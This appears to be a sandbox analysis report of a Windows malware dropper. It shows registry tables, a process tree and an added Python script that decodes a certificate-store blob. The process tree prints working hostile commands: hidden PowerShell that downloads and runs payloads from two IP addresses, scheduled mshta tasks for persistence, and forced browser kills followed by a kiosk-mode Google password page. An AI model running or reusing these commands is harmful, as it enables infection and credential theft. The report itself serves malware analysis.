| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data elided in this export) | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data elided in this export) | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe | N/A |
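The "Modifies system certificate store" rows record a Blob value written under AuthRoot for thumbprint 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 by two of the dropped executables, and the blob itself carries the certificate. The script below is an added example, not the report's own output: it decodes the CryptoAPI property format the Blob value uses (a run of prop_id, reserved, length, data records, with the DER under CERT_CERT_PROP_ID 32), checks that the SHA-1 of the embedded DER equals the key name, and pulls out the friendly name, subject key identifier and common names. Property names follow wincrypt.h; the blob bytes and registry path are the ones the table shows for ca0c233e68.exe. The store check at the end is this example's reading, not a report finding: AuthRoot\Certificates is the cache Windows' automatic root update fills when a process first builds a chain to a root it does not yet hold, so a well-known public root landing there with a matching thumbprint while the sample talks TLS is expected noise, whereas a self-signed certificate appearing under HKLM or HKCU ...\Root\Certificates would be a planted trust anchor and the real finding.

```python
"""Decode a SystemCertificates ...\\Certificates\\<SHA1>\\Blob registry value.

Added example, not part of the report. REG_PATH and the blob bytes are the
ones the report shows for ca0c233e68.exe; property-id names follow the
CERT_*_PROP_ID constants in wincrypt.h; the store interpretation is this
example's own.
"""
import hashlib
import re
import struct

REG_PATH = (r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot"
            r"\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob")

# Blob hex from the report, split at the property records the parser recovers
BLOB_HEX = (
    "190000000100000010000000ba4f3972e7aed9dccdc210db59da13c9"              # 25: subject public key MD5
    "0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25"      # 3: SHA-1 hash
    "1d00000001000000100000008f76b981d528ad4770088245e2031b63"              # 29: subject name MD5
    "0b0000000100000012000000440069006700690043006500720074000000"          # 11: friendly name, UTF-16LE
    "140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc3"      # 20: subject key identifier
    "5300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0"  # 83: root program policies
    "090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308"  # 9: EKU
    "0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8"      # 15: signature hash
    "2000000001000000c9030000"                                              # 32: certificate, 0x3c9 bytes of DER follow
    "308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500"
    "306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341"
    "301e170d3036313131303030303030305a170d3331313131303030303030305a"
    "306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341"
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"
    "c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8d"
    "b3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb"
    "0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3"
    "300d06092a864886f70d01010505000382010100"
    "1c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b"
    "318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a"
)
BLOB = bytes.fromhex(BLOB_HEX)

PROP_NAMES = {3: "sha1_hash", 9: "enhanced_key_usage", 11: "friendly_name",
              20: "key_identifier", 32: "certificate"}
PATH_RE = re.compile(r"\\SystemCertificates\\(?P<store>[^\\]+)\\Certificates\\(?P<thumb>[0-9A-Fa-f]{40})\\Blob$")
# OID 2.5.4.3 (commonName) followed by a PrintableString/UTF8String with a short-form length
CN_RE = re.compile(rb"\x06\x03\x55\x04\x03[\x13\x0c]([\x01-\x7f])")


def parse_blob(blob):
    """Walk the (prop_id u32, reserved u32, length u32, data) records that
    CryptoAPI serialises a certificate context's properties into."""
    props, off = {}, 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:  # observed as 1 in every CryptoAPI-written blob
            raise ValueError(f"unexpected reserved field {reserved} for property {prop_id}")
        data = blob[off:off + length]
        if len(data) != length:
            raise ValueError(f"property {prop_id} truncated")
        off += length
        props[PROP_NAMES.get(prop_id, f"prop_{prop_id}")] = data
    return props


def der_total_length(der):
    """Size of the outermost DER SEQUENCE including its tag and length bytes."""
    if der[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    if der[1] < 0x80:
        return 2 + der[1]
    n = der[1] & 0x7F
    return 2 + n + int.from_bytes(der[2:2 + n], "big")


def extract_cn(der, which):
    """N-th commonName in the DER (0 = issuer, 1 = subject inside a TBS);
    a regex shortcut rather than an ASN.1 parser, enough for triage."""
    m = list(CN_RE.finditer(der))[which]
    n = m.group(1)[0]
    return der[m.end():m.end() + n].decode("latin-1")


def triage(reg_path, blob):
    """Cross-check the key name against the embedded certificate and name the store."""
    m = PATH_RE.search(reg_path)
    if not m:
        raise ValueError("not a certificate Blob value path")
    store, thumb = m.group("store"), m.group("thumb").lower()
    props = parse_blob(blob)
    der = props["certificate"]
    issuer_cn, subject_cn = extract_cn(der, 0), extract_cn(der, 1)
    return {
        "store": store,
        "thumbprint": thumb,
        "sha1_property_matches_key": props["sha1_hash"].hex() == thumb,
        "der_sha1_matches_key": hashlib.sha1(der).hexdigest() == thumb,
        "der_length_consistent": der_total_length(der) == len(der),
        "friendly_name": props["friendly_name"].decode("utf-16-le").rstrip("\x00"),
        "subject_key_identifier": props["key_identifier"].hex(),
        "subject_cn": subject_cn,
        "self_signed_name_match": issuer_cn == subject_cn,
        # AuthRoot is the auto-root-update cache; a planted anchor would sit under ...\Root\Certificates
        "looks_like_auto_root_update": store.lower() == "authroot",
    }


if __name__ == "__main__":
    for k, v in triage(REG_PATH, BLOB).items():
        print(f"{k:<30} {v}")
```

On the report's blob the DER hashes to the key name, the friendly name is DigiCert and both common names read DigiCert High Assurance EV Root CA, so this row is the root-update cache being populated rather than a rogue root being installed; the same check run against a Root store write with a mismatching or self-issued certificate is where the signature would deserve its weight.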
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"
C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
"C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9D29.tmp\9D2A.tmp\9D2B.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
"C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE
"C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "KuBZrmaKyUJ" /tr "mshta \"C:\Temp\VNx3gTICP.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\VNx3gTICP.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe
"C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 1020
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe
"C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe"
C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe
"C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {39E3C316-04D7-43F7-8E3A-F5C9C00AD883} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
C:\ProgramData\rbkvgg\bdhx.exe
C:\ProgramData\rbkvgg\bdhx.exe
C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe
"C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1204
C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe
"C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe"
C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe
"C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.0.1404389395\1587828078" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1244 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b681ec8d-5d35-487d-8b3e-c7bb73e798bb} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1352 101d8c58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.1.1074487475\2015986347" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8f1d330-493f-4204-865d-da67d0e22595} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1544 eeeb258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.2.122218642\1120858895" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a181cd1-bc5b-461d-b6bb-1934de5fb0e0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2000 19f72158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.3.258885724\1036051148" -childID 2 -isForBrowser -prefsHandle 2756 -prefMapHandle 2752 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0887fe63-5db0-427d-9249-418af38093f7} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2768 1b31bd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.4.783715881\1406145648" -childID 3 -isForBrowser -prefsHandle 3868 -prefMapHandle 3864 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {157a3b0f-d809-4fad-9176-d73dc0da1f4d} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3880 207da558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.5.1641785714\443642166" -childID 4 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {753f3ee8-a3e6-4ddb-8e77-4a5ec56d69a5} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3976 207dba58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
